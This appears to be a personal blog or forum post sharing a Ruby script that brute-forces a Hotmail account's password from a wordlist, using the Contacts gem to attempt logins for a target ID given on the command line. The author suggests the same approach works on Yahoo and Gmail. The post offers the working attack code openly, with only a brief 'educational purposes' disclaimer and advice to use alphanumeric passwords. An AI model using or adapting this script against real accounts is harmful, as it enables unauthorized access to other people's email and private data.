hey dudes. Today i am going to share a code snippet i worked on couple of days ago. Originally the idea of this script was given by Nuvana.Her hubby recovered her lost password when she forgot it. So i wanted to get my hands dirty with some ruby code, and wanted to try out this one. Actually i succeeded.

The program is written in ruby so you need ruby interpreter to execute this, and the Contacts gem is needed as well. However performing attacks like this on people's accounts is not sensible and takes a lot of time. It is even not worth the time spent on cracking because there is only 20-30 percent chance of actually getting others passwords.

This program is written for educational purposes only and to let you all know that, these kinds of attacks exist and your account can be hacked. So i request you all to change your passwords to alpha-numeric for atleast a bare minimum. here is the code

#!D:\Ruby\bin\ruby
require "contacts"

# This program will have benchmarking
# set initial counter
i = Time.now

# Set initial wordlist 
passes = Array.new
file = File.open('words.txt','r')
file.each_line do |w|
    passes << w
end

# start the bruteforce attack with the provided wordlist
for $w in passes do
    begin
        contacts = Contacts::Hotmail.new(ARGV[0], $w).contacts
        puts "PWNED!! The password is #{$w}"
        break
    rescue Contacts::AuthenticationError
        puts "#{$w} as a password didn't work!"
    end
end

# output the time it took to execute the whole script
puts "It took #{Time.now - i} seconds to execute the whole attack!"

As you can see, cracking the passwords rely on the quality of the wordlist being used. This can be done to hotmail, yahoo and gmail passwords as well. The id must be passed as the first argument to the program in order to crack his/her password.